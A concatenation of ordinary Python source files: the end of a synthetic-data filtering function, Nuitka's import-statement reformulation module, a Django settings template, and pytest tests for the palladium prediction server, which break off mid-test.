    num_cols = [col for col in x_train.columns if "num" in col]
    for num_col in num_cols:
        min_val = x_test[num_col].quantile(0.02)
        max_val = x_test[num_col].quantile(0.98)
        generated_df = generated_df.loc[
            (generated_df[num_col] >= min_val) & (generated_df[num_col] <= max_val)
        ]
    generated_df = generated_df.reset_index(drop=True)
    # Rank candidate rows by how much they resemble the test distribution.
    ad_model = adversarial_test(x_test, generated_df.drop("target", axis=1), cat_cols)
    generated_df["test_similarity"] = ad_model.predict(
        generated_df.drop("target", axis=1), return_shape=False
    )
    generated_df.sort_values("test_similarity", ascending=False, inplace=True)
    generated_df = generated_df.head(int(gen_x_times * x_train.shape[0]))
    x_train = pd.concat(
        [x_train, generated_df.drop("test_similarity", axis=1)], axis=0
    ).reset_index(drop=True)
    del generated_df
    gc.collect()
    return x_train.drop("target", axis=1), x_train["target"]
| |
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Reformulation of import statements.
Consult the developer manual for information. TODO: Add ability to sync
source code comments with developer manual sections.
"""
from nuitka.nodes.AssignNodes import (
StatementAssignmentVariable,
StatementAssignmentVariableName,
StatementReleaseVariable,
)
from nuitka.nodes.ConstantRefNodes import makeConstantRefNode
from nuitka.nodes.FutureSpecs import FutureSpec
from nuitka.nodes.GlobalsLocalsNodes import ExpressionBuiltinGlobals
from nuitka.nodes.ImportNodes import (
ExpressionBuiltinImport,
ExpressionImportModuleHard,
ExpressionImportName,
StatementImportStar,
)
from nuitka.nodes.NodeMakingHelpers import mergeStatements
from nuitka.nodes.StatementNodes import StatementsSequence
from nuitka.nodes.VariableRefNodes import ExpressionTempVariableRef
from nuitka.PythonVersions import python_version
from .ReformulationTryFinallyStatements import makeTryFinallyStatement
from .SyntaxErrors import raiseSyntaxError
from .TreeHelpers import makeStatementsSequenceOrStatement, mangleName
# For checking afterwards, if __future__ imports really were at the beginning
# of the file.
_future_import_nodes = []


def checkFutureImportsOnlyAtStart(body):
    """Verify every recorded __future__ import sits at the top of *body*.

    Recorded future-import nodes are ticked off as they are met; hitting
    any other node while recorded imports remain means a __future__ import
    appears after other statements, which is a syntax error.
    """
    for node in body:
        try:
            # Tick off the node if it is one of the recorded future imports.
            _future_import_nodes.remove(node)
        except ValueError:
            if _future_import_nodes:
                raiseSyntaxError(
                    """\
from __future__ imports must occur at the beginning of the file""",
                    _future_import_nodes[0].source_ref.atColumnNumber(
                        _future_import_nodes[0].col_offset
                    ),
                )
def _handleFutureImport(provider, node, source_ref):
    """Process one "from __future__ import ..." statement node."""
    # Future imports are only legal at module level, never inside functions
    # or classes.
    if not provider.isCompiledPythonModule():
        raiseSyntaxError(
            """\
from __future__ imports must occur at the beginning of the file""",
            source_ref.atColumnNumber(node.col_offset),
        )

    for import_desc in node.names:
        _enableFutureFeature(
            node=node,
            object_name=import_desc.name,
            source_ref=source_ref,
        )

    # Remember it for checks to be applied once module is complete, e.g. if
    # they are all at module start.
    node.source_ref = source_ref
    _future_import_nodes.append(node)
# Stack of active future specs, one per module currently being built.
_future_specs = []


def pushFutureSpec():
    """Open a fresh FutureSpec for the module about to be built."""
    _future_specs.append(FutureSpec())


def getFutureSpec():
    """Return the FutureSpec of the module currently being built."""
    return _future_specs[-1]


def popFutureSpec():
    """Drop the FutureSpec of the module just finished."""
    _future_specs.pop()
def _enableFutureFeature(node, object_name, source_ref):
    """Enable the named __future__ feature on the current FutureSpec.

    "braces" and unknown feature names are reported as syntax errors at the
    position of the import node.
    """
    future_spec = _future_specs[-1]

    if object_name == "unicode_literals":
        future_spec.enableUnicodeLiterals()
    elif object_name == "absolute_import":
        future_spec.enableAbsoluteImport()
    elif object_name == "division":
        future_spec.enableFutureDivision()
    elif object_name == "print_function":
        future_spec.enableFuturePrint()
    elif object_name == "barry_as_FLUFL" and python_version >= 0x300:
        # Easter-egg feature, only meaningful on Python3.
        future_spec.enableBarry()
    elif object_name == "generator_stop":
        future_spec.enableGeneratorStop()
    elif object_name == "braces":
        # CPython's own joke response to "from __future__ import braces".
        raiseSyntaxError("not a chance", source_ref.atColumnNumber(node.col_offset))
    elif object_name in ("nested_scopes", "generators", "with_statement"):
        # These are enabled in all cases already.
        pass
    elif object_name == "annotations" and python_version >= 0x370:
        future_spec.enableFutureAnnotations()
    else:
        raiseSyntaxError(
            "future feature %s is not defined" % object_name,
            source_ref.atColumnNumber(node.col_offset),
        )
def buildImportFromNode(provider, node, source_ref):
    """Build the node tree for ``from x import ...`` statements.

    Returns either a StatementImportStar (for ``from x import *``) or a
    StatementsSequence of per-name assignments, with a temporary variable
    holding the imported module when more than one name is imported.
    """
    # "from .. import .." statements. This may trigger a star import, or
    # multiple names being looked up from the given module variable name.
    # This is pretty complex.
    # pylint: disable=too-many-branches,too-many-locals,too-many-statements
    module_name = node.module if node.module is not None else ""
    level = node.level
    # Use default level under some circumstances.
    if level == -1:
        level = None
    elif level == 0 and not _future_specs[-1].isAbsoluteImport():
        level = None
    if level is not None:
        level_obj = makeConstantRefNode(level, source_ref, True)
    else:
        level_obj = None
    # Importing from "__future__" module may enable flags to the parser,
    # that we need to know about, handle that.
    if module_name == "__future__":
        _handleFutureImport(provider, node, source_ref)
    target_names = []
    import_names = []
    # Mapping imported "fromlist" to assigned "fromlist" if any, handling the
    # star case as well.
    for import_desc in node.names:
        object_name, local_name = import_desc.name, import_desc.asname
        if object_name == "*":
            # A star import is marked with a None placeholder target.
            target_names.append(None)
            assert local_name is None
        else:
            target_names.append(local_name if local_name is not None else object_name)
        import_names.append(object_name)
    # Star imports get special treatment.
    if None in target_names:
        # More than "*" is a syntax error in Python, need not care about this at
        # all, it's only allowed value for import list in this case.
        assert target_names == [None]
        # Python3 made it so that these can only occur on the module level,
        # so this a syntax error if not there. For Python2 it is OK to
        # occur everywhere though.
        if not provider.isCompiledPythonModule() and python_version >= 0x300:
            raiseSyntaxError(
                "import * only allowed at module level",
                source_ref.atColumnNumber(node.col_offset),
            )
        if provider.isCompiledPythonModule():
            import_globals = ExpressionBuiltinGlobals(source_ref)
            import_locals = ExpressionBuiltinGlobals(source_ref)
        else:
            # Inside a function, locals for the import are an empty dict.
            import_globals = ExpressionBuiltinGlobals(source_ref)
            import_locals = makeConstantRefNode({}, source_ref, True)
        return StatementImportStar(
            target_scope=provider.getLocalsScope(),
            module_import=ExpressionBuiltinImport(
                name=makeConstantRefNode(module_name, source_ref, True),
                globals_arg=import_globals,
                locals_arg=import_locals,
                fromlist=makeConstantRefNode(("*",), source_ref, True),
                level=level_obj,
                source_ref=source_ref,
            ),
            source_ref=source_ref,
        )
    else:
        if module_name == "__future__":
            # "__future__" is resolved as a hard (compile time known) import.
            imported_from_module = ExpressionImportModuleHard(
                module_name="__future__", source_ref=source_ref
            )
        else:
            imported_from_module = ExpressionBuiltinImport(
                name=makeConstantRefNode(module_name, source_ref, True),
                globals_arg=ExpressionBuiltinGlobals(source_ref),
                locals_arg=makeConstantRefNode(None, source_ref, True),
                fromlist=makeConstantRefNode(tuple(import_names), source_ref, True),
                level=level_obj,
                source_ref=source_ref,
            )
        # If we have multiple names to import, consider each.
        multi_names = len(target_names) > 1
        statements = []
        if multi_names:
            # Keep the imported module in a temporary variable, so each name
            # lookup uses the very same module object.
            tmp_import_from = provider.allocateTempVariable(
                temp_scope=provider.allocateTempScope("import_from"), name="module"
            )
            statements.append(
                StatementAssignmentVariable(
                    variable=tmp_import_from,
                    source=imported_from_module,
                    source_ref=source_ref,
                )
            )
            imported_from_module = ExpressionTempVariableRef(
                variable=tmp_import_from, source_ref=source_ref
            )
        import_statements = []
        first = True
        for target_name, import_name in zip(target_names, import_names):
            # Make a clone of the variable reference, if we are going to use
            # another one.
            if not first:
                imported_from_module = imported_from_module.makeClone()
            first = False
            import_statements.append(
                StatementAssignmentVariableName(
                    provider=provider,
                    variable_name=mangleName(target_name, provider),
                    source=ExpressionImportName(
                        module=imported_from_module,
                        import_name=import_name,
                        level=0,
                        source_ref=source_ref,
                    ),
                    source_ref=source_ref,
                )
            )
        # Release the temporary module value as well.
        if multi_names:
            statements.append(
                makeTryFinallyStatement(
                    provider=provider,
                    tried=import_statements,
                    final=(
                        StatementReleaseVariable(
                            variable=tmp_import_from, source_ref=source_ref
                        ),
                    ),
                    source_ref=source_ref,
                )
            )
        else:
            statements.extend(import_statements)
        # Note: Each import is sequential. It can succeed, and the failure of a
        # later one is not undoing previous ones. We can therefore have a
        # sequence of imports that each only import one thing therefore.
        return StatementsSequence(
            statements=mergeStatements(statements), source_ref=source_ref
        )
def buildImportModulesNode(provider, node, source_ref):
    """Build assignment statements for ``import a, b.c as d`` statements."""
    # Import modules statement. As described in the developer manual, these
    # statements can be treated as several ones.
    import_names = [
        (import_desc.name, import_desc.asname) for import_desc in node.names
    ]
    import_nodes = []
    for import_desc in import_names:
        module_name, local_name = import_desc
        module_topname = module_name.split(".")[0]
        # Note: The "level" of import is influenced by the future absolute
        # imports.
        level = (
            makeConstantRefNode(0, source_ref, True)
            if _future_specs[-1].isAbsoluteImport()
            else None
        )
        import_node = ExpressionBuiltinImport(
            name=makeConstantRefNode(module_name, source_ref, True),
            globals_arg=ExpressionBuiltinGlobals(source_ref),
            locals_arg=makeConstantRefNode(None, source_ref, True),
            fromlist=makeConstantRefNode(None, source_ref, True),
            level=level,
            source_ref=source_ref,
        )
        if local_name:
            # If is gets a local name, the real name must be used as a
            # temporary value only, being looked up recursively.
            for import_name in module_name.split(".")[1:]:
                import_node = ExpressionImportName(
                    module=import_node,
                    import_name=import_name,
                    # TODO: Does level make sense at all, should be removed.
                    level=0,
                    source_ref=source_ref,
                )
        # If a name was given, use the one provided, otherwise the import gives
        # the top level package name given for assignment of the imported
        # module.
        import_nodes.append(
            StatementAssignmentVariableName(
                provider=provider,
                variable_name=mangleName(
                    local_name if local_name is not None else module_topname, provider
                ),
                source=import_node,
                source_ref=source_ref,
            )
        )
    # Note: Each import is sequential. It will potentially succeed, and the
    # failure of a later one is not changing that one bit . We can therefore
    # have a sequence of imports that only import one thing therefore.
    return makeStatementsSequenceOrStatement(
        statements=import_nodes, source_ref=source_ref
    )
| |
"""
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os.path
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'djskeletor',
'ENGINE': 'django.db.backends.mysql',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.humanize',
    'django.contrib.messages',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.staticfiles',
    'djskeletor',
    'djskeletor.core',
    'djskeletor.myapp',
    'djtools',
)
# NOTE(review): MIDDLEWARE_CLASSES is the pre-Django-1.10 setting name;
# newer Django expects MIDDLEWARE -- confirm the Django version in use.
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(os.path.dirname(__file__), 'templates'),
            "/data2/django_templates/djkorra/",
            "/data2/django_templates/djcher/",
            "/data2/django_templates/",
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                "djtools.context_processors.sitevars",
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.media',
                # NOTE(review): 'django.core.context_processors.request' is the
                # pre-1.8 dotted path; Django 1.8+ uses
                # 'django.template.context_processors.request' -- verify.
                'django.core.context_processors.request',
                'django.template.context_processors.static',
                'django.contrib.messages.context_processors.messages',
            ],
            #'loaders': [
            #    # insert your TEMPLATE_LOADERS here
            #]
        },
    },
]
# caching
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
        #'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        #'LOCATION': '127.0.0.1:11211',
        #'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
        #'LOCATION': '/var/tmp/django_directory_cache',
        #'TIMEOUT': 60*20,
        #'KEY_PREFIX': "DIRECTORY_",
        #'OPTIONS': {
        #    'MAX_ENTRIES': 80000,
        #}
    }
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_PORT = '636'
LDAP_PROTOCOL = "ldaps"
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
# auth backends
# LDAP is tried first, falling back to Django's model-based auth.
AUTHENTICATION_BACKENDS = (
    'djauth.ldapBackend.LDAPBackend',
    'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_carthage_cookie'
# Session lifetime: one day, in seconds.
SESSION_COOKIE_AGE = 86400
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
# Rotating file log for app loggers, console for Django, mail for errors.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'formatters': {
        'standard': {
            'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
            'datefmt' : "%Y/%b/%d %H:%M:%S"
        },
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
            'datefmt' : "%Y/%b/%d %H:%M:%S"
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'handlers': {
        'logfile': {
            'level':'DEBUG',
            'class':'logging.handlers.RotatingFileHandler',
            'filename': LOG_FILENAME,
            # Rotate at ~50 KB, keeping two backups.
            'maxBytes': 50000,
            'backupCount': 2,
            'formatter': 'standard',
        },
        'console':{
            'level':'INFO',
            'class':'logging.StreamHandler',
            'formatter': 'standard'
        },
        'mail_admins': {
            'level': 'ERROR',
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'mugshots.upload': {
            'handlers':['logfile'],
            'propagate': True,
            'level':'DEBUG',
        },
        'core': {
            'handlers':['logfile'],
            'propagate': True,
            'level':'DEBUG',
        },
        'django': {
            'handlers':['console'],
            'propagate': True,
            'level':'WARN',
        },
        'django.db.backends': {
            'handlers': ['console'],
            'level': 'DEBUG',
            'propagate': False,
        },
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
| |
from datetime import datetime
import io
import json
import math
from threading import Thread
from time import sleep
from unittest.mock import call
from unittest.mock import Mock
from unittest.mock import patch
import dateutil.parser
from flask import request
import numpy as np
import pytest
import ujson
from werkzeug.exceptions import BadRequest
def dec(func):
    """Test decorator: appends '_decorated' to whatever *func* returns."""
    def inner(*args, **kwargs):
        """dec"""
        result = func(*args, **kwargs)
        return result + '_decorated'
    return inner
class TestPredictService:
    """Tests for palladium.server.PredictService.

    Fix: the ``mock_predict`` fixture used ``@pytest.yield_fixture``, which
    has been deprecated since pytest 3.0 and was removed in pytest 6.0;
    ``@pytest.fixture`` supports yield fixtures directly and is what the
    rest of this module already uses.
    """
    @pytest.fixture
    def PredictService(self):
        from palladium.server import PredictService
        return PredictService
    def test_functional(self, PredictService, flask_app):
        model = Mock()
        model.threshold = 0.3
        model.size = 10
        # needed as hasattr would evaluate to True otherwise
        del model.threshold2
        del model.size2
        model.predict.return_value = np.array(['class1'])
        service = PredictService(
            mapping=[
                ('sepal length', 'float'),
                ('sepal width', 'float'),
                ('petal length', 'float'),
                ('petal width', 'float'),
                ('color', 'str'),
                ('age', 'int'),
                ('active', 'bool'),
                ('austrian', 'bool'),
            ],
            params=[
                ('threshold', 'float'),  # default will be overwritten
                ('size', 'int'),  # not provided, default value kept
                ('threshold2', 'float'),  # will be used, no default value
                ('size2', 'int'),  # not provided, no default value
            ])
        with flask_app.test_request_context():
            with patch('palladium.util.get_config') as get_config:
                get_config.return_value = {
                    'service_metadata': {
                        'service_name': 'iris',
                        'service_version': '0.1'
                    }
                }
                request = Mock(
                    args=dict([
                        ('sepal length', '5.2'),
                        ('sepal width', '3.5'),
                        ('petal length', '1.5'),
                        ('petal width', '0.2'),
                        ('color', 'purple'),
                        ('age', '1'),
                        ('active', 'True'),
                        ('austrian', 'False'),
                        ('threshold', '0.7'),
                        ('threshold2', '0.8'),
                    ]),
                    method='GET',
                )
                resp = service(model, request)
        # Sample columns are converted per the mapping before predict().
        assert (model.predict.call_args[0][0] ==
                np.array([[5.2, 3.5, 1.5, 0.2,
                           'purple', 1, True, False]], dtype='object')).all()
        assert model.predict.call_args[1]['threshold'] == 0.7
        assert model.predict.call_args[1]['size'] == 10
        assert model.predict.call_args[1]['threshold2'] == 0.8
        assert 'size2' not in model.predict.call_args[1]
        assert resp.status_code == 200
        expected_resp_data = {
            "metadata": {
                "status": "OK",
                "error_code": 0,
                "service_name": "iris",
                "service_version": "0.1",
            },
            "result": "class1"
        }
        assert json.loads(resp.get_data(as_text=True)) == expected_resp_data
    def test_bad_request(self, PredictService, flask_app):
        predict_service = PredictService(mapping=[])
        model = Mock()
        request = Mock()
        with patch.object(predict_service, 'do') as psd:
            with flask_app.test_request_context():
                bad_request = BadRequest()
                bad_request.args = ('daniel',)
                psd.side_effect = bad_request
                resp = predict_service(model, request)
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 400
        assert resp_data == {
            "metadata": {
                "status": "ERROR",
                "error_code": -1,
                "error_message": "BadRequest: ('daniel',)"
            }
        }
    def test_predict_error(self, PredictService, flask_app):
        from palladium.interfaces import PredictError
        predict_service = PredictService(mapping=[])
        model = Mock()
        request = Mock()
        with patch.object(predict_service, 'do') as psd:
            with flask_app.test_request_context():
                psd.side_effect = PredictError("mymessage", 123)
                resp = predict_service(model, request)
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 500
        assert resp_data == {
            "metadata": {
                "status": "ERROR",
                "error_code": 123,
                "error_message": "mymessage",
            }
        }
    def test_generic_error(self, PredictService, flask_app):
        predict_service = PredictService(mapping=[])
        model = Mock()
        request = Mock()
        with patch.object(predict_service, 'do') as psd:
            with flask_app.test_request_context():
                psd.side_effect = KeyError("model")
                resp = predict_service(model, request)
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 500
        assert resp_data == {
            "metadata": {
                "status": "ERROR",
                "error_code": -1,
                "error_message": "KeyError: 'model'",
            }
        }
    def test_sample_from_data(self, PredictService):
        predict_service = PredictService(
            mapping=[
                ('name', 'str'),
                ('sepal width', 'int'),
            ],
        )
        model = Mock()
        request_args = {'name': 'myflower', 'sepal width': 3}
        sample = predict_service.sample_from_data(model, request_args)
        assert sample[0] == 'myflower'
        assert sample[1] == 3
    def test_unwrap_sample_get(self, PredictService, flask_app):
        predict_service = PredictService(
            mapping=[('text', 'str')],
            unwrap_sample=True,
        )
        model = Mock()
        model.predict.return_value = np.array([1])
        with flask_app.test_request_context():
            request = Mock(
                args=dict([
                    ('text', 'Hi this is text'),
                ]),
                method='GET',
            )
            resp = predict_service(model, request)
        # unwrap_sample yields a 1-d array instead of a 2-d one.
        assert model.predict.call_args[0][0].ndim == 1
        model.predict.assert_called_with(np.array(['Hi this is text']))
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 200
        assert resp_data == {
            "metadata": {
                "status": "OK",
                "error_code": 0,
            },
            "result": 1,
        }
    def test_unwrap_sample_post(self, PredictService, flask_app):
        predict_service = PredictService(
            mapping=[('text', 'str')],
            unwrap_sample=True,
        )
        model = Mock()
        model.predict.return_value = np.array([1, 2])
        with flask_app.test_request_context():
            request = Mock(
                json=[
                    {'text': 'First piece of text'},
                    {'text': 'Second piece of text'},
                ],
                method='POST',
                mimetype='application/json',
            )
            resp = predict_service(model, request)
        assert model.predict.call_args[0][0].ndim == 1
        assert (
            model.predict.call_args[0] ==
            np.array(['First piece of text', 'Second piece of text'])
            ).all()
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 200
        assert resp_data == {
            "metadata": {
                "status": "OK",
                "error_code": 0,
            },
            "result": [1, 2],
        }
    def test_probas(self, PredictService, flask_app):
        model = Mock()
        model.predict_proba.return_value = np.array([[0.1, 0.5, math.pi]])
        predict_service = PredictService(mapping=[], predict_proba=True)
        with flask_app.test_request_context():
            resp = predict_service(model, request)
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 200
        assert resp_data == {
            "metadata": {
                "status": "OK",
                "error_code": 0,
            },
            "result": [0.1, 0.5, math.pi],
        }
    def test_post_request(self, PredictService, flask_app):
        model = Mock()
        model.predict.return_value = np.array([3, 2])
        service = PredictService(
            mapping=[
                ('sepal length', 'float'),
                ('sepal width', 'float'),
                ('petal length', 'float'),
                ('petal width', 'float'),
            ],
            params=[
                ('threshold', 'float'),
            ],
        )
        request = Mock(
            json=[
                {
                    'sepal length': '5.2',
                    'sepal width': '3.5',
                    'petal length': '1.5',
                    'petal width': '0.2',
                },
                {
                    'sepal length': '5.7',
                    'sepal width': '4.0',
                    'petal length': '2.0',
                    'petal width': '0.7',
                },
            ],
            args=dict(threshold=1.0),
            method='POST',
            mimetype='application/json',
        )
        with flask_app.test_request_context():
            resp = service(model, request)
        assert (model.predict.call_args[0][0] == np.array([
            [5.2, 3.5, 1.5, 0.2],
            [5.7, 4.0, 2.0, 0.7],
            ],
            dtype='object',
            )).all()
        assert model.predict.call_args[1]['threshold'] == 1.0
        assert resp.status_code == 200
        expected_resp_data = {
            "metadata": {
                "status": "OK",
                "error_code": 0,
            },
            "result": [3, 2],
        }
        assert json.loads(resp.get_data(as_text=True)) == expected_resp_data
    @pytest.fixture
    def mock_predict(self, monkeypatch):
        # Replace palladium.server.predict so routes simply echo their
        # entry point.  (Was @pytest.yield_fixture; see class docstring.)
        def mock_predict(model_persister, predict_service):
            return predict_service.entry_point
        monkeypatch.setattr(
            'palladium.server.predict', mock_predict)
        yield mock_predict
    def test_entry_point_not_set(
            self, config, flask_app_test, flask_client, mock_predict):
        from palladium.config import process_config
        config['model_persister'] = Mock()
        config['predict_service'] = {
            '!': 'palladium.server.PredictService',
            'mapping': [
                ('param', 'str'),
            ],
        }
        # set default predict_decorators
        config['predict_decorators'] = ['palladium.tests.test_server.dec']
        with flask_app_test.test_request_context():
            process_config(config)
        resp1 = flask_client.get(
            'predict?param=bla')
        # decorated result: default predict_decorators is defined
        assert resp1.get_data().decode('utf-8') == '/predict_decorated'
    def test_entry_point_multiple(
            self, config, flask_app_test, flask_client, mock_predict):
        from palladium.config import process_config
        config['model_persister'] = Mock()
        config['my_predict_service'] = {
            '!': 'palladium.server.PredictService',
            'mapping': [
                ('param', 'str'),
            ],
            'entry_point': '/predict1',
        }
        config['my_predict_service2'] = {
            '!': 'palladium.server.PredictService',
            'mapping': [
                ('param', 'str'),
            ],
            'entry_point': '/predict2',
            'decorator_list_name': 'predict_decorators2',
        }
        # only second predict service uses decorator list
        config['predict_decorators2'] = ['palladium.tests.test_server.dec']
        with flask_app_test.test_request_context():
            process_config(config)
        resp1 = flask_client.get(
            'predict1?param=bla')
        # no decorated result: default predict_decorators is not defined
        assert resp1.get_data().decode('utf-8') == '/predict1'
        resp2 = flask_client.get(
            'predict2?param=bla')
        # decorated result using predict_decorators2
        assert resp2.get_data().decode('utf-8') == '/predict2_decorated'
    def test_entry_point_multiple_conflict(
            self, config, flask_app_test, flask_client, mock_predict):
        from palladium.config import process_config
        config['model_persister'] = Mock()
        config['my_predict_service'] = {
            '!': 'palladium.server.PredictService',
            'mapping': [
                ('param', 'str'),
            ],
            'entry_point': '/predict1',  # <--
        }
        config['my_predict_service2'] = {
            '!': 'palladium.server.PredictService',
            'mapping': [
                ('param', 'str'),
            ],
            'entry_point': '/predict1',  # conflict: entry point exists
        }
        with pytest.raises(AssertionError):
            with flask_app_test.test_request_context():
                process_config(config)
class TestPredict:
    """Tests for the palladium.server.predict view function."""
    @pytest.fixture
    def predict(self):
        from palladium.server import predict
        return predict
    def test_predict_functional(self, config, flask_app_test, flask_client):
        from palladium.server import make_ujson_response
        model_persister = config['model_persister'] = Mock()
        predict_service = config['predict_service'] = Mock()
        with flask_app_test.test_request_context():
            from palladium.server import create_predict_function
            create_predict_function(
                '/predict', predict_service, 'predict_decorators', config)
        predict_service.return_value = make_ujson_response(
            'a', status_code=200)
        model = model_persister.read()
        resp = flask_client.get(
            'predict?sepal length=1.0&sepal width=1.1&'
            'petal length=0.777&petal width=5')
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp_data == 'a'
        assert resp.status_code == 200
        # The service must have been invoked with the persisted model.
        with flask_app_test.test_request_context():
            predict_service.assert_called_with(model, request)
    def test_unknown_exception(self, predict, flask_app):
        model_persister = Mock()
        model_persister.read.side_effect = KeyError('model')
        with flask_app.test_request_context():
            resp = predict(model_persister, Mock())
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp.status_code == 500
        assert resp_data == {
            "status": "ERROR",
            "error_code": -1,
            "error_message": "KeyError: 'model'",
        }
class TestAliveFunctional:
    """End-to-end tests for the /alive health-check endpoint."""
    def test_empty_process_state(self, config, flask_client):
        config['service_metadata'] = {'hello': 'world'}
        resp = flask_client.get('alive')
        assert resp.status_code == 200
        resp_data = json.loads(resp.get_data(as_text=True))
        assert sorted(resp_data.keys()) == ['memory_usage',
                                            'memory_usage_vms',
                                            'palladium_version',
                                            'process_metadata',
                                            'service_metadata']
        assert resp_data['service_metadata'] == config['service_metadata']
    def test_filled_process_state(self, config, process_store, flask_client):
        config['alive'] = {'process_store_required': ('model', 'data')}
        # Bracket the store writes so the reported 'updated' timestamps
        # can be range-checked below.
        before = datetime.now()
        process_store['model'] = Mock(__metadata__={'hello': 'is it me'})
        process_store['data'] = Mock(__metadata__={'bye': 'not you'})
        after = datetime.now()
        resp = flask_client.get('alive')
        assert resp.status_code == 200
        resp_data = json.loads(resp.get_data(as_text=True))
        model_updated = dateutil.parser.parse(resp_data['model']['updated'])
        data_updated = dateutil.parser.parse(resp_data['data']['updated'])
        assert before < model_updated < after
        assert resp_data['model']['metadata'] == {'hello': 'is it me'}
        assert before < data_updated < after
        assert resp_data['data']['metadata'] == {'bye': 'not you'}
    def test_missing_process_state(self, config, process_store, flask_client):
        config['alive'] = {'process_store_required': ('model', 'data')}
        process_store['model'] = Mock(__metadata__={'hello': 'is it me'})
        resp = flask_client.get('alive')
        # Required 'data' entry missing -> service unavailable.
        assert resp.status_code == 503
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp_data['model']['metadata'] == {'hello': 'is it me'}
        assert resp_data['data'] == 'N/A'
class TestPredictStream:
    """Tests for palladium.server.PredictStream (line-based predict loop)."""
    @pytest.fixture
    def PredictStream(self):
        from palladium.server import PredictStream
        return PredictStream
    @pytest.fixture
    def stream(self, config, PredictStream):
        config['model_persister'] = Mock()
        predict_service = config['predict_service'] = Mock()
        # Pass request data through unchanged for easier assertions.
        predict_service.sample_from_data.side_effect = (
            lambda model, data: data)
        predict_service.params_from_data.side_effect = (
            lambda model, data: data)
        return PredictStream()
    def test_listen_direct_exit(self, stream):
        io_in = io.StringIO()
        io_out = io.StringIO()
        io_err = io.StringIO()
        # NOTE(review): target=stream.listen(...) CALLS listen right here;
        # its return value (None) becomes the thread target, so the work
        # happens synchronously and the Thread itself runs nothing.
        stream_thread = Thread(
            target=stream.listen(io_in, io_out, io_err))
        stream_thread.start()
        io_in.write('EXIT\n')
        stream_thread.join()
        io_out.seek(0)
        io_err.seek(0)
        assert len(io_out.read()) == 0
        assert len(io_err.read()) == 0
        assert stream.predict_service.predict.call_count == 0
    def test_listen(self, stream):
        io_in = io.StringIO()
        io_out = io.StringIO()
        io_err = io.StringIO()
        lines = [
